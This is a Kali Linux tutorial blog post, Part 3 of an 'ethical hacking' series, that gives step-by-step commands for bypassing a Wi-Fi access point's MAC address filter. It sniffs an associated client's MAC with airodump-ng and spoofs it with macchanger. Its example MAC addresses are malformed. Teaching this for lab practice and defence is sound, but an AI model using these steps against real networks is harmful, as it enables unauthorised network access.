Ethical Hacking with Kali Linux – Part 3: Bypassing the MAC Address Filter

April 1, 2016 | Views: 23570

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Ethical Hacking with Kali Linux – Part 3: Bypassing the MAC Address Filter

>> Welcome all, to this series of Kali Linux for Ethical Hacking. This is third part and I’ll explain process of bypassing the MAC Address Filter on an AP (Access Point).


# 3 Basic Process:

– Finding the AP: airmon-ng & airodump-ng

– Finding an associated client: airodump-ng

– Finally, using the MACchanger


# . . . Let’s Begin

– Before starting, make sure that you have eth0, lo, wlan0 in action. (Go to terminal and run ifconfig.)

– Let’s start to monitor on the wireless interface. Run:

airmon-ng start wlan0

– After executing above command, we must get new interface mon0 (Monitor mode enabled.)

– Verify that both interfaces are up and running, run:


– Watch for wlan0 and mon0, run:

airodump-ng mon0

– For monitoring all the APs that Kali Linux OS can find out.

– In the next step, you’ll get BSSID and ESSID, channel, cipher. If there’s any hidden SSID, then ESSID will be formatted like this: <length: 0> or with no SSID.

Note: We saw in second part how to uncover this hidden SSID. But, here you can use any SSID with Open Encryption, or SSID with known password.

– We will use the MAC address that was seen in part 2. i.e. 00:A1:B2:11:20:13:5T and channel ‘1’ (Assume the MAC address filter is done in this system. Let’s suppose it’s SSID is nhc-BJ.)

– Now, we try to find out the client and his MAC associated with this AP (nhc-BJ).

– So we can use that MAC to bypass filter, run:

airodump-ng -c 1 -a –bssid 00:A1:B2:11:20:13:5T mon0

(-c is for channel, channel is 1 for BSSID; we’re are trying to connect. -a is for showing only the client associated with this BSSID.)

– You’ll get the MAC address with the station associated with that AP, and this is the client’s station. (Let’s assume Mac = 00:C1:52:11:20:13:7D).

– CTRL+C (press)

– Run:

macchanger –help
(notice, -m for setting mac)


macchanger -m 00:C1:52:11:20:13:7D wlan0

(If the device or resource busy, then run following command:)

airmon-ng stop wlan0

– Run:

macchanger -m 00:C1:52:11:20:13:7D wlan0

(If successful, you’ll see a message like ‘faked MAC’)


ifconfig wlan0 down

ifconfig wlan0 up

(Let’s see whether we can associate with the SSID now or not with this faked MAC)

– Run:

iwconfig wlan0 essid nhc-BJ channel 1

(If not, run in Kali and run it in BackTrack. Or, see the updated version of Kali.)

iwconfig wlan0

(If successful, the Access Point will be associated.)


A quick note: This series is only for educational purpose. Practice this series in a lab, in a virtual/separate network and always avoid illegal activities. If you can, then support us in fighting the bad guys.

See the other posts in this series:

Ethical Hacking with Kali Linux – Part 1: Objective
Ethical Hacking with Kali Linux – Part 2: Finding Hidden SSIDS
Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless
Ethical Hacking with Kali Linux – Part5: Rogue Wireless Access Points
Ethical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)

By: BIJAY ACHARYA  (twitter : @acharya_bijay)

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Thanks bro!


  3. Thanks for this article man, really thanks

  4. Thanks for sharing valuable information.

  5. Very Useful article !

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?